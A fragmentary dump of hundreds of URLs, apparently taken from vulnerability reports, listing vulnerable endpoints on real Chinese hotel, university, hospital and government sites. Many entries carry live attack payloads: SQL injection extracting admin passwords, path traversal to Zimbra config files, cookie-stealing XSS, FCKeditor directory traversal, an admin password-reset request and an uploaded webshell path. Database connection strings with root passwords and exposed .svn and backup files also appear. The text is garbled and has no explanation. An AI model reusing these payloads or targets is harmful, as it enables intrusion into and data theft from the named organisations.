http://www.easelandhotel.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 aihotel.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 baohonghotel.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 baolilai-hotel.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 
bmgcn.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 chinameetings.cn/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 dehan.test.dossm.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 devpaytmpl3v15.test.dossm.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 dgdh.test.dossm.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 dggarden.royalhotels.cn/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 dgrhm.group.dossm.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 dzhgz.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 easelandhotel.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 
electron.physics.buffalo.edu/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 fhschotel.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 guangzhougdhhotel.com/saas/Guest/getOrderByOrderNoAndLastName/?jsoncallback=jQuery191047288946458138525_1426852425845&order_no=00011891&last_name=test123%40qq.com&client_account=gz_yljr&language=zh-tw&code=&_=1426852425846 www.3496666.com www.aihotel.com www.baohonghotel.com www.baolilai-hotel.com www.baronyhotels.com www.bllhotel.com www.bmgcn.com www.chinameetings.cn www.cnicc.com www.colorfuldays-hotel.com www.coscohotels.cn www.coscohotels.com www.coscohotels.com.cn www.dgeahotel.com www.dgybhotel.com www.dzhgz.com www.dzyhotel.com www.easelandhotel.com www.ebdh-hotel.com www.eco-hotel.com.cn www.eversunshinehotel.com www.fcghotel.com www.fhschotel.com www.gbvh.com www.gdhhotels.com www.gdyutonghotel.com www.glamorhotel.com www.goldenhotel.com.cn www.goldsourcehotel.com www.guangzhougdhhotel.com www.guishanhotel.com www.hainanyataihotel.com www.harmonahotel.com www.hebs.asia www.horizon.com.cn www.horizoncbs.com www.horizonsanya.com www.hotelsjianguo.com www.huaponthotel.com www.hwndjd.com www.jadesea.cn www.jbstel.com www.jianguohotelgz.com www.jianliharmonyhotel.com www.jindinghotel.cn www.joyahotel.cn www.joyahotel.com www.kuntairoyalhotel.com www.lndfhotel-sh.com www.lphotel.cn www.lyhotspring.com www.muhaihotel.com www.oceanhotel.com.cn www.osresort.cn www.ouyahotels.com www.physics.buffalo.edu www.pinweijiudian.com www.prgardenhotel.com.cn www.qianzhouwan.com www.qsshotel.com www.ramadaplazagz.com www.regalia.com.cn www.resortgp.com www.resortintime.com www.rhgresorts.com www.risinghotel.com www.royalgardenhotel.com.cn 
www.royalhotels.cn www.royalmarinaplaza.com www.sanya31.com www.sanyabarry.com www.sanyaliking.com www.sevenraygolf.com www.shangrilaassociation.org www.singwood.com.cn www.soluxehotel.com www.soluxehotelgz.com www.sunshinehotel.com www.sunshinehotels.cn www.sunshinehotelzjj.com www.szjingdu.com www.tfsunshinehotel.com www.themulian.com www.tianfuyuan.com www.vaya-hotel.cn www.wakingtown-hotel.com www.wenfenghotel.com www.wintour.cn www.wmjh.cn www.wuzhishanyatai.com www.wx-hotel.com www.xianhuamanwu.com www.xiaoqingmai.com www.xn--sjqu43axxn38f.com www.xsfd.com www.yalongbaygolfclub.com www.yangshuoholiday.com www.yfkxhotel.com www.yhihotel.com www.yingbinhotel.cn www.ysdidu.com www.znhyfd.cn www.zzghhotel.com http://118.186.218.66/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml http://118.186.218.217/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml http://www.bhyuanqutong.com http://116.211.4.186/config/config_global.php.bak http://www.ggg.cn/ http://www2.zuche.com/console/ www.myctu.cn http://circle.myctu.cn/api.php?app=userauth:api&mod=plugin¶m=uid%3D0&random=0.5043484827037901&_=1428579086625 http://www.bllib.net.cn:8080/vod/vod_List.html?CategoryID=2&type=M http://www.msit21.com/vod/vod_List.html?CategoryID=2&type=M http://202.197.107.11:86/vod/vod_List.html?CategoryID=1&type=M http://mail.tdsy.org/vod/vod_List.html?CategoryID=2&type=M http://163.21.191.31/vod/vod_List.html?CategoryID=2&type=M http://urumqiland.gov.cn/searchJSYD.action http://www.bhgzc.com/sys/repdel.asp?id=0 http://www.hhhtgzc.com/sys/repdel.asp?id=0 http://www.kqgzc.com/sys/repdel.asp?id=0 http://sggzccn.cnc506.000pc.net/sys/repdel.asp?id=0 http://www.erdostjgzc.com/sys/repdel.asp?id=0 http://support.cnic.cn/.svn/entries http://support.cnic.cn/afrole/main/loginframe/.svn/entries 
http://support.cnic.cn/portal/.svn/entries http://support.cnic.cn/mobile/.svn/entries http://www.easelandhotel.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 aihotel.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 baohonghotel.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 baolilai-hotel.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 bmgcn.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 chinameetings.cn/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 dehan.test.dossm.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 devpaytmpl3v15.test.dossm.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 dgdh.test.dossm.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 dggarden.royalhotels.cn/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 dgrhm.group.dossm.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 dzhgz.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 easelandhotel.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 electron.physics.buffalo.edu/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 fhschotel.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 guangzhougdhhotel.com/saas/Booking/step4/?jsoncallback=jQuery19107825722324196249_1426852288319 www.3496666.com www.aihotel.com www.baohonghotel.com www.baolilai-hotel.com www.baronyhotels.com www.bllhotel.com www.bmgcn.com www.chinameetings.cn www.cnicc.com www.colorfuldays-hotel.com www.coscohotels.cn www.coscohotels.com www.coscohotels.com.cn www.dgeahotel.com www.dgybhotel.com www.dzhgz.com www.dzyhotel.com www.easelandhotel.com www.ebdh-hotel.com www.eco-hotel.com.cn www.eversunshinehotel.com 
www.fcghotel.com www.fhschotel.com www.gbvh.com www.gdhhotels.com www.gdyutonghotel.com www.glamorhotel.com www.goldenhotel.com.cn www.goldsourcehotel.com www.guangzhougdhhotel.com www.guishanhotel.com www.hainanyataihotel.com www.harmonahotel.com www.hebs.asia www.horizon.com.cn www.horizoncbs.com www.horizonsanya.com www.hotelsjianguo.com www.huaponthotel.com www.hwndjd.com www.jadesea.cn www.jbstel.com www.jianguohotelgz.com www.jianliharmonyhotel.com www.jindinghotel.cn www.joyahotel.cn www.joyahotel.com www.kuntairoyalhotel.com www.lndfhotel-sh.com www.lphotel.cn www.lyhotspring.com www.muhaihotel.com www.oceanhotel.com.cn www.osresort.cn www.ouyahotels.com www.physics.buffalo.edu www.pinweijiudian.com www.prgardenhotel.com.cn www.qianzhouwan.com www.qsshotel.com www.ramadaplazagz.com www.regalia.com.cn www.resortgp.com www.resortintime.com www.rhgresorts.com www.risinghotel.com www.royalgardenhotel.com.cn www.royalhotels.cn www.royalmarinaplaza.com www.sanya31.com www.sanyabarry.com www.sanyaliking.com www.sevenraygolf.com www.shangrilaassociation.org www.singwood.com.cn www.soluxehotel.com www.soluxehotelgz.com www.sunshinehotel.com www.sunshinehotels.cn www.sunshinehotelzjj.com www.szjingdu.com www.tfsunshinehotel.com www.themulian.com www.tianfuyuan.com www.vaya-hotel.cn www.wakingtown-hotel.com www.wenfenghotel.com www.wintour.cn www.wmjh.cn www.wuzhishanyatai.com www.wx-hotel.com www.xianhuamanwu.com www.xiaoqingmai.com www.xn--sjqu43axxn38f.com www.xsfd.com www.yalongbaygolfclub.com www.yangshuoholiday.com www.yfkxhotel.com www.yhihotel.com www.yingbinhotel.cn www.ysdidu.com www.znhyfd.cn www.zzghhotel.com http://www.cscecgc.com/ http://member.stockstar.com/service/kefu/service_kf.asp http://www.chinafoundation.org.cn/search?m=25181 http://www.xaagri.gov.cn/Search.aspx?type=0&key= http://www.qyjyj.cn/Auth_login.action http://zjwyh.cn/fckeditor/editor/filemanager//connectors/test.html 
http://sjcj.czili.edu.cn/fckeditor/editor/filemanager//connectors/test.html http://data.jmi.edu.cn/fckeditor/editor/filemanager//connectors/test.html http://data.niit.edu.cn/fckeditor/editor/filemanager//connectors/test.html http://sjcj.jsjzi.edu.cn/fckeditor/editor/filemanager//connectors/test.html http://sjcj.czlgj.com/fckeditor/editor/filemanager//connectors/test.html http://sfys.ccit.js.cn/fckeditor/editor/filemanager//connectors/test.html http://www.pjzyy.cn/default.aspx http://pjzyysys.s21.csome.cn/News.aspx?News_ID=232 http://laikeyiliao.com/News.aspx?News_ID=86 http://www.ld-hospital.com/News.aspx?News_ID=276 http://web.fanjinkj.cn/News.aspx?News_ID=3003 http://www.smhc.org.cn/等级:三级甲等 http://www.smhc.org.cn/whir_system/module/security/ezEIP_login.aspx http://www.smhc.org.cn/uploadfiles/2015/04/201504092035513551.aspx http://www.smhc.org.cn/uploadfiles/2015/04/201504092118401840.aspx http://guanli.usth.net.cn/denglu.asp http://xiuxiu.huodong.meitu.com/0408/#rd http://pim.hn165.com/ http://pim.hn165.com/admin/ http://pim.hn165.com http://kyc.synu.edu.cn//UserFiles/File/web.jsp www.jjcgs.com/ArticleView.aspxid=55_ www.jjcgs.com/manager/_ http://tuanwei.web.sdutcm.edu.cn/NoticeView.asp?id=30 http://www.pptv.com/ http://passport.pptv.com/fetchpassword.aspx http://**.**.**/zjsb/login.asp_ http://www.iteye.com/)搜索处存在反射型跨站: http://wooyun.org/bugs/wooyun-2010-090196 http://www.wanche.com.cn/orderdetail/110010-0-0 http://www.wanche.com.cn/orderdetail/110011-0-0 http://www.2cto.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=662dCAZSAwgFUlUJBAxbVQJXVghTWVQHVFMEV1MRX11cBFMKBFMGHkUROlhBTVFuW1FJBAUVBwIXRlgeERUHQVlIUVJAA0lRXABSQEwNXAhZVl5V http://www.xiaomaow.com/s/index.asp?id=24&a=tgdetails&prodid=21%20union%20select%20%201,2,password,4,5,6,7,8,9%20from%20mall_admin%20%16 http://www.gtgw.wang/s/index.asp?id=1&a=tgdetails&prodid=18%20union%20select%20top%201%201,2,password,4,5,6,7,8,9%20from%20mall_admin%20%16 
http://shop.bjpc-link.cn/s/index.asp?id=1&a=tgdetails&prodid=18%20union%20select%20top%201%201,2,admin,4,5,6,7,8,9%20from%20mall_admin%20%20%16 http://www.idiniu.com/s/index.asp?id=42&a=tgdetails&prodid=41%20union%20select%20top%201%201,2,password,4,5,6,7,8,9%20from%20mall_admin%20%16 http://www.v0755.cn/s/index.asp?id=1&a=tgdetails&prodid=18%20union%20select%20top%201%201,2,password,4,5,6,7,8,9%20from%20mall_admin%20%16 http://www.maizfx.com/s/index.asp?id=46&a=tgdetails&prodid=27%20union%20select%20top%201%201,2,password,4,5,6,7,8,9%20from%20mall_admin%20%16 http://www.hunau.edu.cn http://v.cngold.com.cn/results.html?keyword= http://wooyun.org/bugs/wooyun-2015-0102508 http://s.wanda.cn http://s.wanda.cn/mw/mobile/login.html http://s.wanda.cn/Upload/20150410/ASPXSpy-[%E6%B8%A9%E5%B7%9E%E9%BE%99%E6%B9%BE%E4%B8%87%E8%BE%BE%E5%B9%BF%E5%9C%BA-2015410145126681].aspx http://118.145.0.82:2051/gps/login wxb.njcgs.com/readme.txt http://localhost/free/account.php?action=address http://localhost/free/sort.php http://www.okvoice.com/details.php?news_id=308 http://www.fdip.cn http://www.fdip.cn/cms/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://www.fdip.cn/cms/FCKeditor/editor/filemanager/browser/default/browser.htm?Type=Image&Connector=http://www.fdip.cn/cms/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector http://tjdt.tbmmis.com/StateList.aspx https://**.**.**/zhangyijun/autoapp/blob/35ae6a7675b294ec01c8d26d1713db09323a8eee/config.js_ http://**.**.**/confluence/dashboard.action_ http://**.**.**/jira/secure/Dashboard.jspa_ http://**.**.**/redmine/my/page http://www.donvieware.com:8085/servlet/vodsys.MovieList?catid=17 http://125.88.124.147:8085/servlet/vodsys.MovieList?catid=17 http://121.10.252.178:8085/servlet/vodsys.MovieList?catid=17 http://61.189.240.78:8085/servlet/vodsys.MovieList?catid=17 http://183.61.117.164:8085/servlet/vodsys.MovieList?catid=17 
http://www.xtszwh.com/aspx/main.html http://eplab.usst.edu.cn/home/nst.php http://www.cnyes.com/ http://www.donvieware.com:8085/servlet/vodsys.useradmin.UserInfor?id=299 http://125.88.124.147:8085/servlet/vodsys.useradmin.UserInfor?id=522 http://121.10.252.178:8085/servlet/vodsys.useradmin.UserInfor?id=348 http://61.189.240.78:8085/servlet/vodsys.useradmin.UserInfor?id=2599 http://183.61.117.164:8085/servlet/vodsys.useradmin.UserInfor?id=2566 http://www.ettoday.net/ http://sdkim.cmge.com/ http://sdkim.cmge.com/login!login.do http://job.super8.com.cn/ https://**.**.**/ucenter/stgl/pwd_question.php https://**.**.**/ucenter/stgl/pwd_question_s.phpnewpwd=admin123&newpwd1=admin123&uid=admin&passwd=&questions=&answer=&step=4&act=forget&lang=1 http://fofa.so/search/result?page=2&q=中科新业网络安全审计系统 http://open.dangdang.com/ http://gim.jlu.edu.cn/yjsy/yzhc/view.jsp?bh=14320 http://mall.cmbchina.com/Search.aspx?keyword=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD+--%3E%27%22%3E%3Ciframe/onload=alert%28document.cookie%29%3E http://job.csdn.net/enterpriselibrary/search http://job.csdn.net/enterpriselibrary/search?keyword=%27 http://www.zjhz.lss.gov.cn/ http://www.zjhz.lss.gov.cn/html/wsbs/cyxxcx/queryCompCredited.html?year=%24%7b10000-99%7d http://114.251.227.138/login.do http://my.yonyou.com/xmlrpc http://share.fetionyy.com.cn/redmine http://www.601601.com http://xxs.la/AgNpO2 http://hb.dh.jl.cn/admin/login.asp http://hb.dh.jl.cn/home/news/detail.asp?subjectid=017&id=92 http://hb.dh.jl.cn/home/news/index.asp?subjectid=017 http://hb.dh.jl.cn/admin/Extension/news/index.asp?subjectid=001 http://hb.dh.jl.cn/admin/Extension/news/edit.asp?subjectid=001 http://hb.dh.jl.cn/home/bbs/admin/book/qwbm_book.asp?xinb=m http://hb.dh.jl.cn/home/bbs/admin/book/qwbm_book.asp?lei=1 http://hb.dh.jl.cn/admin/user/edit.asp?id=1 http://hb.dh.jl.cn/admin/group/edit.asp?id=1 http://hb.dh.jl.cn/admin/module/edit.asp?id=1 com:10.96.141.73 com:10.100.133.99 http://php.mukewang.com/.svn/entries 
http://ideone.com/api/1/service.wsdl http://join.qq.com/ http://**.**.**/json_db/other_report.aspxits=3&jq=0&stype=&dfs=0&levels=111 http://www.xsc.lnnu.edu.cn/ http://www.xsc.lnnu.edu.cn/Admin_problem_havebug/,存在注入 http://61.146.213.154/website/approve/approveSiteAction.action http://my.hupu.com/ http://114.251.157.170/admin/frame!loginExc.do http://218.78.241.80/anmai/teacher/zonghe/singleSearch.aspx?action1=1 http://jmzx.xmedu.cn:9999/anmai/teacher/zonghe/singleSearch.aspx?action1=1 http://www.gxbyzx.cn:88/anmai/teacher/zonghe/singleSearch.aspx?action1=1 http://oa.w12z.com/anmai/teacher/zonghe/singleSearch.aspx?action1=1 http://www.xwgjzx.com:8888/anmai/teacher/zonghe/singleSearch.aspx?action1=1 http://www.dy-fda.gov.cn http://www.dy-fda.gov.cn/admin_z/login.php http://jiaju.loupan.com/space.php?uid=*** http://jiaju.loupan.com/index.php?action/viewcomment/op/delete/itemid/1/cid/369/type/members%20set%20groupid=1%20where%20uid=2047569%23/ismodle/1 http://2.loupan.com/api//20150411020119.php http://218.249.38.206:9191/iot-hmi-web-museum/iot/user/login.jsp http://218.249.38.206:9191/iot-hmi-web-museum/iot/softWareVersion/softWareDownloadPage.action jdbc:mysql://localhost:3306/iotplatform201411?user=root&password=123456&useUnicode=true&characterEncoding=UTF-8 jdbc:mysql://192.168.82.15:3306/iotplatform_bowuguan_20141219?user=root&password=root&useUnicode=true&characterEncoding=UTF-8 http://www.pzhdqedu.gov.cn/mysqladmin/ www.jsyzcgs.com/getjwj.phpop=1_ http://gschool.hebmu.edu.cn/web_admin/ftb.imagegallery.aspx http://yjs.xzmc.edu.cn/web_admin/ftb.imagegallery.aspx http://yjshb.depart.hebust.edu.cn/web_admin/ftb.imagegallery.aspx http://gr.besti.edu.cn/web_admin/ftb.imagegallery.aspx http://yjs.cdutcm.edu.cn/web_admin/ftb.imagegallery.aspx http://60.208.116.173:81/sjyoa/ http://xxx/main.asp http://xxx/systemManagement.asp http://xxx/ConfNetWork.asp http://xxx/SystemInfoForm.asp http://www.bioknow.net/portal/root/website_bioknow/index.jsp 
http://www.hjcdms.com/portal/root/gcp_data/gg_nr.jsp?id=12681222 http://www.bioknow.cn/portal/root/lims_std/gg_nr.jsp?id=3340763136 http://218.75.123.195:8181/portal/root/lcky1/gg_nr.jsp?id=37486592 http://www.tcmadr.com/portal/root/gcp_data_dzmyy/gg_nr.jsp?id=46825472 http://gzboji-edc.com/portal/root/eip_cro/gg_nr.jsp?id=9109504 http://upload.tjfae.com/Login.aspx http://mss.alxd.com.cn/login.html http://www.langbang.net/default.aspx http://www.jzpsy.cn/WebUser/CheckUserName/?username=1 http://www.gzweining.gov.cn/WebUser/CheckUserName/?username=1 http://xpzmjsz.qswtv.com/WebUser/CheckUserName/?username=1 http://www.gzuce.com/WebUser/CheckUserName/?username=1 http://120.27.54.236:8018/WebUser/CheckUserName/?username=1 http://www.bioknow.net/portal/root/website_bioknow/index.jsp http://tcmadr.com/portal/root/gcp_data_dzmyy/gg_list.jsp?nowlx=欢迎页面 http://molpharm.jiangnan.edu.cn/portal/root/lims_std/gg_list.jsp?nowlx=公告 http://www.bioknow.cn/portal/root/lims_std/gg_list.jsp?nowlx=通知 http://211.69.141.135/portal/root/lims_std/gg_list.jsp?nowlx=通知 http://gzboji-edc.com/portal/root/eip_cro/gg_list.jsp?nowlx=一般公告 http://www.foyoedu.com/ http://xszx.mhedu.sh.cn/cjcx/bkxt/xxpj.asp?id=1 http://www.dlyzx.edu.sh.cn/cjcx/bkxt/xxpj.asp?id=1 http://www.tjyfz1.edu.sh.cn/cjcx/bkxt/xxpj.asp?id=1 http://tygz.mhedu.sh.cn/cjcx/bkxt/xxpj.asp?id=1 http://222.72.139.155:15580/cjcx/bkxt/xxpj.asp?id=1 http://hxd.4000211929.com/ http://218.78.241.80/anmai/time/jiaoshirenke/teasubject.aspx?type=set1&classno=1 http://jmzx.xmedu.cn:9999/anmai/time/jiaoshirenke/teasubject.aspx?type=set1&classno=1 http://www.gxbyzx.cn:88/anmai/time/jiaoshirenke/teasubject.aspx?type=set1&classno=1 http://oa.w12z.com/anmai/time/jiaoshirenke/teasubject.aspx?type=set1&classno=1 http://www.xwgjzx.com:8888/anmai/time/jiaoshirenke/teasubject.aspx?type=set1&classno=1 http://202.204.50.16/clientweb/xcus/ic2/ http://202.204.50.16/upload/ http://202.204.50.16/Pages/ic/Report/Main.aspx www.dysga.gov.cn 
www.dysga.gov.cn/web_manager/ http://i.steelcn.cn/passport/password.aspx http://www.ci.gxnu.edu.cn/fms/Login.aspx http://61.156.3.103:8280/rightmanage/login.jspa http://58.250.192.31/ http://www.capitaledge.cn/Capitaledge/report_findAll.action http://gx.kk3g.net/ http://www.schd.com.cn/web.rar http://media.sisu.edu.cn https://mail.zuche.com/,这个系统有两个安全问题: http://www.invest-zibo.gov.cn:7080/zsj/index.htm http://www.invest-zibo.gov.cn:7080/zsj/download/UserDownload.do http://www.invest-zibo.gov.cn:7080/zsj/download/UserDownload.do http://www.invest-zibo.gov.cn:7080/myname/index.jsp http://www.invest-zibo.gov.cn:7080/myname/wooyun.jsp http://www.kinggolden.com/cn/aboutus.asp?id=4 mobiletsp.com/myaccount.login http://218.60.147.16 http://202.96.63.175/main.aspx http://221.10.252.20/ http://answer.tongyi.com/index.php/question/search?PHPSESSID=640ff09fbb772c41398a6690def6ae0e&k=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E&pn=1&subject=0 http://answer.tongyi.com/index.php/question/search?PHPSESSID=640ff09fbb772c41398a6690def6ae0e&k=%E4%BB%A3%E6%95%B0%E5%BC%8F&pn=1&subject=0 http://cq.cits.cn/order/group/041504-8656.html http://cq.cits.cn/order/group/订单号.html http://zeaie.zjedu.org/register.php http://www.metadata.com.cn/ http://59.74.114.252:84/poweb/Ip.do?method=addIp&schoolid=301041 http://219.222.177.236:8080/poweb/Ip.do?method=addIp&schoolid=281041 http://222.29.253.58:8080/poweb/Ip.do?method=addIp&schoolid=011002 http://202.206.242.26:88/poweb/Ip.do?method=addIp&schoolid=171024 http://211.67.126.11:8088/poweb/Ip.do?method=addIp&schoolid=051042 VERSION:1.2.3 www.tadu.com http://www.tadu.com之后看到登陆的地方没有验证码限制 http://www.southsoft.com.cn/ http://gschool.hebmu.edu.cn/CuteSoft_Client/CuteEditor/Load.ashx http://121.28.142.134:50000/CuteSoft_Client/CuteEditor/Load.ashx http://mbaxy.zjgsu.edu.cn/CuteSoft_Client/CuteEditor/Load.ashx http://gra.njutcm.edu.cn/CuteSoft_Client/CuteEditor/Load.ashx http://yjshb.depart.hebust.edu.cn/CuteSoft_Client/CuteEditor/Load.ashx 
http://passport.safedog.cn/redirect_to_mail_verify.html?userName=admin http://www.zjportal.net/Pages/Layout/masterpage.htm http://app.cdutetc.cn/index.jsp http://218.60.147.20:8088/index.jsp http://211.162.119.217/Home/Login https://www.tzydb.com/ http://www.locoy.com/member/getpwd.php http://www.locoy.com/member/getpwd.php?action=getpwd&step=4&userid=[用户ID]&authstr=[32位加密码 www.locoy.com http://mm.263.com/ http://business.cwnu.edu.cn/shows!queryToIndex.action http://www.bcrj.com.cn/ http://index.gfxy.com/reference/queryReference.jsp?course_name=%B2%E2%CA%D4&course_id=123 http://reader.library.neusoft.edu.cn/reference/queryReference.jsp?course_name=%B2%E2%CA%D4&course_id=123 http://proxy.gfxy.com/reference/queryReference.jsp?course_name=%B2%E2%CA%D4&course_id=123 http://lib.hebau.edu.cn:8080/reference/queryReference.jsp?course_name=%B2%E2%CA%D4&course_id=123 http://opac.cafa.com.cn:8080/reference/queryReference.jsp?course_name=%B2%E2%CA%D4&course_id=123 http://www.zxxs.unimip.cn:8086/sms/sendsms.action http://58.67.193.147/ http://**.**.**/_ http://www.fhyx.com/auction/buy.html http://jinma.rixer.cn/ http://pic.cnnb.com.cn/showtheme.php?themeid=125119&columnid=photoclass18 http://222.168.7.148/index.jsp http://222.168.7.148 http://124.133.7.94/article.aspx?articleid=1093 https://mail.qztc.edu.cn/coremail/XJS/index.jsp?sid=BAtnWINNoQUHhxrGpDNNbnFcTBXnQKbD http://221.231.143.11/www/njga/gajz/index.htm http://221.231.143.11/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://www.njfy.gov.cn:8080//FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://www.njjg.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://njfy.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ 
http://www.njyhfy.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://www.njygcj.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://www.njmg.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://njlhqsfj.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://www.njjg.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://www.njlsxsfj.gov.cn//FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ http://www.njmj.gov.cn/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../ ftp://202.114.255.27/ http://www.cust.edu.tw/www/post/ezshow3.php?id=6090 http://ttxxhb.nenu.edu.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@%60\%27%60%20/*!50000union*//*!50000select*/1,2,3,%28select%20CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60%20limit+0,1%29,5,6,7,8,9%23@%60\%27%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294 http://www.hanqing.ruc.edu.cn:80/ www.hanqing.ruc.edu.cn http://www.jssports.gov.cn:100/govxxgk/m_5_1/govdiropen/que_chooseusers.jsp http://www.tudou.com/programs/view/wmQHmEEyM4E/ http://www.tudou.com/programs/view/wmQHmEEyM4E/ http://www.njqcnz.net.cn/main/messageadd.action http://www.abwh.gov.cn/scjg/Login.asp http://college.transn.com/ecat/app/index.php?gangwei=&nandu=1&task_id=359ba832ab8926dde6717c32bb14c0f5 www.gxgxw.gov.cn http://bl.wuxi.gov.cn/ http://www.x-rosen.com/pro.php?id=84%27 http://www.chinapnr.com/news/wp-login.php 
